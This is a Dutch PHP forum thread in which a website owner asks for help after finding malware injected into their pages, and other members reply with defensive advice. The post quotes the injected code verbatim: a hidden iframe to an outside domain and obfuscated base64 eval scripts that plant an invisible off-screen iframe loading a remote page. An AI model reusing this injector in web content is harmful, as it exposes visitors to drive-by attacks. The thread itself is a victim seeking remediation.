Hackers?

Overzicht Reageren

Sponsored by: Vacatures door Monsterboard

Front-end Developer (HTML/CSS, Angular/React/Vue,

Functie Je zal aan de slag gaan in een klein, hecht team met front-end development experts die de ambitie delen mooi werk te leveren. Samen met hen zal je werken aan het gebruiksvriendelijk en interactief maken van complexe webapplicaties, websites en mobile apps. Je levert klanten wat ze nodig hebben terwijl je actief aan jezelf blijft werken met de ondersteuning vanuit je werkplek. Talen als Javascript programmeer jij vloeiend en je hebt kennis van frameworks als React en Angular. Je zou je het liefst nog veel meer ontwikkelen in verschillende front-end talen. Deze kennis deel je graag met je collega’s,

Bekijk vacature »

Front-end (Angular) developer - remote werken

Functie Als Front-end (Angular) developer ga je aan de slag met het uitbouwen van hun webapplicatie, als één van de front-end experts ga je samen met collega’s in een devops team werken aan een nieuw front-end voor hun calculatie oplossing. Binnen de calculatiesoftware kunnen meerdere professionals tegelijk samenwerken, 3D calculaties uitvoeren en ook inzien met de benodigde specifieke details. Deze software wordt veel ingezet om projectbeschrijvingen en kosten in kaart te brengen, en tijdens de uitvoering te bewaken. Maar hiernaast liggen er in de toekomst veel meer plannen op het gebied van front-end in de andere applicaties. Genoeg te doen

Bekijk vacature »

Full stack Javascript ontwikkelaar

Functie Benieuwd hoe jouw dag eruit ziet? Je komt binnen rond een uur of 10 en dat start je met de morning call. Dit doen we vanaf het hoofdkantoor of op het lab, ligt eraan welk project je mee bezig bent. Na de call en het verdelen van de tickets ga je met je team aan de slag. Rond een uur of 12 is er een goede lunch en ga je smiddags weer lekker door met je werk. De ene keer maak jij een game voor een groot merk om de interactie tussen product en eindgebruiker te vergroten. De andere

Bekijk vacature »

Oracle APEX developer

Wat je gaat doen: Als Oracle APEX ontwikkelaar bij DPA werk je samen met collega’s aan de meest interessante opdrachten. Je zult je ervaring met SQL, PL/SQL, JavaScript, HTML en CSS inzetten om wensen van opdrachtgevers te vertalen naar technische oplossingen. Je werk is heel afwisselend, omdat DPA zich niet beperkt tot een specifieke branche. Zo ben je de ene keer bezig binnen de zorgsector, de andere keer is dit bij de overheid. Wat we vragen: Klinkt goed? Voor deze functie breng je het volgende mee: Je hebt een hbo- of universitaire opleiding afgerond Je hebt 2 tot 5 jaar

Bekijk vacature »

Magento2 Developer

Functie Ben jij een ontwikkelaar en wil jij een volgende stap zetten en als teamlead aan de slag? Lees dan snel verder! Voor een gewilde opdrachtgever in omgeving Delft zijn wij op zoek naar een programmeur die als meewerkend voorman aan de slag wilt gaan. Een developer die een team van twee man aan zal sturen. Jouw werkzaamheden zullen er als volgt uitzien; Ontwikkelen en ontwerpen van API's; Maatwerkoplossingen; Databeveiliging; Optimalisatie webshops; Ontwikkelen technische implementaties voor verbetering database; Aanspreekpunt voor de organisatie en verantwoordelijk voor de aansturing van externe developers. Zoek je veel uitdaging en veelzijdigheid in je werk dan

Bekijk vacature »

Full Stack Developer

Dit ga je doen Ontwikkelen van Product Informatie Management (PIM) systemen; Werken aan zowel grotere als kleine projecten voor toonaangevende klanten binnen o.a. de retail; Verantwoordelijk voor de front-end werkzaamheden; Naast de front-end werk je ook aan de backend. Hier ga je werken Als Full Stack Developer komt je te werken binnen een vooruitstrevende organisatie die Product Informatie Management (PIM) systemen levert aan hun klanten. Hun klanten zijn toonaangevende bedrijven binnen o.a. de retail. De organisatie zit gevestigd in regio Zwolle en bestaat uit zo'n 35 medewerkers, waarvan 30 IT. Je komt te werken binnen één van de zelfsturende development

Bekijk vacature »

REMOTE - Front-end Angular developer

Functie Het IT-team bestaat momenteel uit de IT Manager, 2 back-end developers, 1 fullstack developer, 1 designer en een DevOps engineer. Ze zijn momenteel op zoek naar een ervaren Front-end developer die autonoom en gedisciplineerd aan de slag gaat, en bij aanvang als enige developer met hun Front-end applicaties bezig is. Wel hebben ze de ambitie om hier snel een 2e developer bij te vinden die jij dan ook zal kunnen aansturen/begeleiden. Je zult aan de slag gaan met het doorontwikkelen van hun bestaande UI in Angular. Maar ook het ontwikkelen van een mobiele app. Hierbij hechten ze veel waarde

Bekijk vacature »

Senior Java developer

Dit ga je doen Jouw taken als Senior Java Developer zijn: Het maken van strategische keuzes omtrent de nieuwbouw van applicaties; Het maken van technische ontwerpen; Hands-on mee ontwikkelen met het team (met o.a. Java FX, JDBC, SQL, REST, Jax-RS, JSON, Maven, JUnit en Spring (boot)); Reviewen van code en feedback geven op collega developers; Analyseren en oplossen van bugs/incidenten door het onderlinge verband te kunnen leggen van verschillende losstaande systemen. Hier ga je werken Het bedrijf waar je als Senior Java Developer komt te werken staat internationaal bekend om het testen van bodemstructuren door middel van echotechnieken en beeldherkenning.

Bekijk vacature »

.NET Developer

Dit ga je doen Programmeren in .NET, Javascript & C# en ontwikkelen in Web Services, Windows Services en MS SQL Server; Zelfstandig verbanden maken Analyseren, testen, bugs fixen, reviewen en rapporteren; Juiste prioriteiten stellen en verantwoordelijkheid nemen; Op architectuur niveau meedenken; Af en toe klanten bezoeken. Hier ga je werken Voor onze relatie zijn wij opzoek naar een .NET ontwikkelaar met minimaal 3 jaar werkervaring. Je komt te werken in een groeiend bedrijf met betrokken collega's die zorgen voor een familiaire sfeer op de werkvloer. Als .NET ontwikkelaar word jij vanaf de eerste werkdag betrokken bij het gehele ontwikkelproces. De

Bekijk vacature »

Front end developer

Functie Jij als ervaren Front end developer bent een expert het gebied van Javascript en React. Je wordt onderdeel van een multidisciplinair team bestaande uit een PO, twee Front end developers, een DevOps/Back end developer, een UX/UI designer en een projectmanager. Verder is er iemand verantwoordelijk voor de HR en is de algemeen directeur nauw betrokken bij alle projecten. Dagelijks hou jij je bezig met de verschillende projecten die zijn opgenomen in de sprint. Daarnaast denk je mee over mogelijke oplossingen om de behoefte van de klant op de beste manier in te vullen. Verder spar jij intern met collega’s

Bekijk vacature »

Low-Code Expert/Developer: Power Platform Speciali

Bedrijfsomschrijving Als Low-Code Expert/Developer bij ons innovatieve bedrijf, neem je een cruciale rol op je in de creatie, ondersteuning en implementatie van diverse oplossingen met behulp van het veelzijdige Power Platform. Dit platform omvat Power Apps, Power BI, Power Automate, Power Virtual Agent en Azure Logic Apps. Het Power Platform biedt je de mogelijkheid om klanten te voorzien van naadloze integraties door op maat gemaakte oplossingen te creëren die compatibel zijn met (bijna) alle bestaande software-infrastructuren. Dankzij het uitgebreide scala aan toepassingen, krijg je de kans om als architect en projectleider van je eigen oplossing te fungeren. Dompel jezelf onder

Bekijk vacature »

Java Programmeur

Functie Heb jij altijd al samen willen werken met ervaren java ontwikkelaars dan hebben wij hier de ultieme kans voor jou! Voor een opdrachtgever in omgeving van Naaldwijk zijn wij op zoek naar uitbreiding van het vaste ontwikkel team. Je zult je hier voornamelijk bezig gaan houden met; Wijzigingsverzoeken van klanten uitvoeren, hier wordt je diep in betrokken; Samen met consultants sluit je aan bij gesprekken met klanten, voor alle projecten; Je schakelt veel met consultants, wat is de behoefte van de klant? Hoe kan je hierop integreren?; Het framework moet naar de Cloud gebracht worden, je wordt betrokken bij

Bekijk vacature »

Medior Java developer (fullstack)

Wat je gaat doen: Of beter nog, wat wil jij doen? Binnen DPA GEOS zijn we dan ook op zoek naar enthousiaste Java developers om ons development team te versterken. Als Java developer werk je in Agile/Scrum teams bij onze klanten en daarbij kun je eventueel ook andere ontwikkelaars begeleiden in het softwareontwikkelproces. Verder draag je positief bij aan de teamgeest binnen een projectteam en je kijkt verder dan je eigen rol. Je gaat software maken voor verschillende opdrachtgevers in jouw regio. Je bent een professional die het IT-vak serieus neemt en kwaliteit levert. Je leert snel vanwege je diepgaande

Bekijk vacature »

Medior Java developer

Wat je gaat doen: Of beter nog, wat wil jij doen? Binnen DPA GEOS zijn we dan ook op zoek naar enthousiaste Java developers om ons development team te versterken. Als Java developer werk je in Agile/Scrum teams bij onze klanten en daarbij kun je eventueel ook andere ontwikkelaars begeleiden in het softwareontwikkelproces. Verder draag je positief bij aan de teamgeest binnen een projectteam en je kijkt verder dan je eigen rol. Je gaat software maken voor verschillende opdrachtgevers in jouw regio. Je bent een professional die het IT-vak serieus neemt en kwaliteit levert. Je leert snel vanwege je diepgaande

Bekijk vacature »

Software developer

Functieomschrijving Voor een gewaardeerde werkgever in de regio van Middelburg zijn wij op zoek naar een ambitieuze PHP/Symfony Developer. Een enthousiast persoon die het development team komt versterken met het aanpakken van complexe en nieuwe projecten. Ben jij op zoek naar een baan met veel uitdaging binnen een snelgroeiend e-commerce bedrijf, waar je de tijd en ruimte krijgt voor zowel persoonlijke als professionele groei? Lees dan snel verder! Dit ga je doen: Aanpassingssuggesties van collega’s in kaart brengen, vervolgens te analyseren en daarna te concluderen of de aanpassing een verbetering is; Ontwikkeling en beheer van de serviceportal in Symfony en

Bekijk vacature »
Olivier Peeters

Olivier Peeters

04/11/2012 13:43:11
Quote Anchor link
Hallo allen,

ik heb een probleem! Blijkbaar is er, op onverklaarbare wijze, op al mijn pagina's deze code toegevoegd =>
"<iframe style="visibility: hidden; display: none; display: none;" src="http://djerseen.com/referer.php?id={A8D99C2D-8615-4C21-AB70-EE2DF83F6905}"></iframe>"


"<script>eval((function(r,s){var t='',p=-8,a=0,b,c;for(var i=0;i<s.length;++){if((c=r.indexOf(s.charAt(i)))<0)continue;a=(a<<6)|(c&63);if((p+=6)>=0){b=(a>>p)&255;if(c!=64)t+=String.fromCharCode(b);a&=63;p-=8;}}returnt;}('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=','dmFyIGtleXNzPSJhcDEybTNuNGo1aTZ1N2RoOGI5djBneXRmY2RyNWV3cWRhcyI7DQp2YXIgZW5jID0gWzUsIDMsIDEsIDExLCAzLCAxMSwgOCwgMTUsIDExLCAyMiwgOV07DQp2YXIgYWggPSBuZXcgRGF0ZSgpLmdldERhdGUoKSsxOw0KdmFyIHVybD0iaHR0cDovLyI7DQpmb3IgKGk9MDtpPGVuYy5sZW5ndGg7aSsrKSB1cmwrPWtleXNzLnN1YnN0cigoYWgqZW5jW2ldKSAlIDMxLDEpOw0KdXJsKz0iLm9yZy90cy9nby5waHAcT0xIjsNCmZmZj0iZnJhbSI7DQppZiAoZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2JvZHknKVswXSkgeyBpZnJhbWVyKCk7fSBlbHNlIHsNCmRvY3VtZW50LndyaXRlKCI8aSIrZmZmKyJlIHNyYz0nIit1cmwrIicgd2lkdGg9JzEwMCcgaGVpZ2h0PScxMDAnIHN0eWxlPSdwb3NpdGlvbjphYnNvbHV0ZTtsZWZ0Oi0xMDAwcHg7dG9wOi0xMDAwcHg7Jz48L2kiK2ZmZisiZT4iKTsNCn0NCmZ1bmN0aW9uIGlmcmFtZXIoKSB7DQp2YXIgZiA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2knK2ZmZisnZScpOw0KZi5zZXRBdHRyaWJ1dGUoJ3NyYycsIHVybCk7DQpmLnN0eWxlLnBvc2l0aW9uID0gJ2Fic29sdXRlJzsNCmYuc3R5bGUubGVmdCA9ICctMTAwMHB4JzsNCmYuc3R5bGUudG9wID0gJy0xMDAwcHgnOw0KZi5zZXRBdHRyaWJ1dGUoJ3dpZHRoJywgJzEwMCcpOw0KZi5zZXRBdHRyaWJ1dGUoJ2hlaWdodCcsICcxMDAnKTsNCmRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdib2R5JylbMF0uYXBwZW5kQ2hpbGQoZ
ik7DQp9')));</script><script>eval((function(r,s){var t='',p=-8,a=0,b,c;for(var i=0;i<s.length;i++){if((c=r.indexOf(s.charAt(i)))<0)continue;a=(a<<6)|(c&63);if((p+=6)>=0){b=(a>>p)&255;if(c!=64)t+=String.fromCharCode(b);a&=63;p-=8;}}return t;}
('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=','dmFyIGtleXNzPSJhcDEybTNuNGo1aTZ1N2RoOGI5djBneXRmY2RyNWV3cWRhcyI7DQp2YXIgZW5jID0gWzUsIDMsIDEsIDExLCAzLCAxMSwgOCwgMTUsIDExLCAyMiwgOV07DQp2YXIgYWggPSBuZXcgRGF0ZSgpLmdldERhdGUoKSsxOw0KdmFyIHVybD0iaHR0cDovLyI7DQpmb3IgKGk9MDtpPGVuYy5sZW5ndGg7aSsrKSB1cmwrPWtleXNzLnN1YnN0cigoYWgqZW5jW2ldKSAlIDMxLDEpOw0KdXJsKz0iLm9yZy90cy9nby5waHAcT0xIjsNCmZmZj0iZnJhbSI7DQppZiAoZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2JvZHknKVswXSkgeyBpZnJhbWVyKCk7fSBlbHNlIHsNCmRvY3VtZW50LndyaXRlKCI8aSIrZmZmKyJlIHNyYz0nIit1cmwrIicgd2lkdGg9JzEwMCcgaGVpZ2h0PScxMDAnIHN0eWxlPSdwb3NpdGlvbjphYnNvbHV0ZTtsZWZ0Oi0xMDAwcHg7dG9wOi0xMDAwcHg7Jz48L2kiK2ZmZisiZT4iKTsNCn0NCmZ1bmN0aW9uIGlmcmFtZXIoKSB7DQp2YXIgZiA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2knK2ZmZisnZScpOw0KZi5zZXRBdHRyaWJ1dGUoJ3NyYycsIHVybCk7DQpmLnN0eWxlLnBvc2l0aW9uID0gJ2Fic29sdXRlJzsNCmYuc3R5bGUubGVmdCA9ICctMTAwMHB4JzsNCmYuc3R5bGUudG9wID0gJy0xMDAwcHgnOw0KZi5zZXRBdHRyaWJ1dGUoJ3dpZHRoJywgJzEwMCcpOw0KZi5zZXRBdHRyaWJ1dGUoJ2hlaWdodCcsICcxMDAnKTsNCmRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdib2R5JylbMF0uYXBwZW5kQ2hpbGQoZ
ik7DQp9')));</script><script>eval((function(r,s){var t='',p=-8,a=0,b,c;for(var i=0;i<s.length;i++){if((c=r.indexOf(s.charAt(i)))<0)continue;a=(a<<6)|
(c&63);if((p+=6)>=0){b=(a>>p)&255;if(c!=64)t+=String.fromCharCode(b);a&=63;p-=8;}}return t;}
('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=','dmFyIGtleXNzPSJhcDEybTNuNGo1aTZ1N2RoOGI5djBneXRmY2RyNWV3cWRhcyI7DQp2YXIgZW5jID0gWzUsIDM
/* Ik heb hier een heel deel weggeknipt, want dit gaat nog paginalang door ;-) Tot de laatste regel */
</script>"

Deze code blijkt dus malware te zijn, welke op onverklaarbaze wijze op mijn website gepost is..

Belangrijk is dat ik dit heb op mijn eigen website (gehost op 3owl), en dat ik deze enkel gemaakt heb dmv PHP-pagina's (dus geen CMS) & Filezilla (overzetten op server). Verder zit er voor het gastenboek een 1 MySQL database op mijn pagina. Deze code is ingesloten in mijn pagina's die zichtbaar zijn in het scherm (dus ge-include pagina's hebben deze code niet)...

Door deze code is mijn site gelocaliseerd als aanvalssite, waardoor deze onbereikbaar is. Link van mijn website is -> http://oli4tje.3owl.com/

Hoe komt het dat ik een hacker heb, wat valt hieraan te doen & hoe in de toekomst vermijden?
Vooral, als alles opgelost is (heb nu wel al alle code verwijderd), hoe zorg ik ervoor dat de melding van aanvalsite terug verwijderd word (& dus terug op een normale manier bezocht kan worden?

Alvast bedankt voor jullie raad/hulp. Want ik snap niet hoe dit kan...

Vriendelijke groeten
 
PHP hulp

PHP hulp

25/04/2024 06:41:57
 
Frank Nietbelangrijk

Frank Nietbelangrijk

04/11/2012 14:11:35
Quote Anchor link
Om de site weer open te stellen lijkt het me handig dat je contact opneemt met je provider. Ik zie dat het een gratis host is? Dus ja daar kunnen we niet al te veel van verwachten. Wat bedoel je precies met ... aan mijn pagina's toegevoegd? Welke bestanden dat willen we weten: PHP HTML? of stond de code in je database?
In ieder geval geldt nu dat je al je wachtwoorden moet veranderen en dat je heel kritisch moet gaan kijken naar alle input van buiten af: dus alle <FORM>'s. de waarden worden - waarschijnlijk met PHP- uitgelezen. Die waarden moet je controleren op alles dat maar mogelijk is en escapen zie
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
<?php
$string
=  mysql_real_escape_string ($string); ?>


Heb je ook een file upload in één of meerdere formulieren? zorg dan dat er nooit geen extensies als PHP e.d. geupload kunnen worden. Je moet dit controleren niet aan de hand van een blacklist maar aan de hand van een whitelist, dus alleen extensies doorlaten die jij goedkeurt
 
Reshad F

Reshad F

04/11/2012 14:12:21
Quote Anchor link
ik denk een FTP lek, wachtwoorden veranderen en bij google developer tools een aanvraag doen voor een rescan of hoe het ook heet.. ( ben het ff kwijt ) maar het is niet te missen als je op de pagina bent. ( binnen ongeveer 2 uur meestal ) zou het probleem opgelost moeten zijn. en anders moet je wachten kan een paar uur duren of een week.. maar als google merkt dat het gevaar weg is dan wordt de melding weggehaald :)
 
Ceasar Feijen

Ceasar Feijen

04/11/2012 14:46:41
Quote Anchor link
Misschien ook je gastenboek even checken. Je kunt nu gewoon op submit drukken en voila
 



Overzicht Reageren

 
 

Om de gebruiksvriendelijkheid van onze website en diensten te optimaliseren maken wij gebruik van cookies. Deze cookies gebruiken wij voor functionaliteiten, analytische gegevens en marketing doeleinden. U vindt meer informatie in onze privacy statement.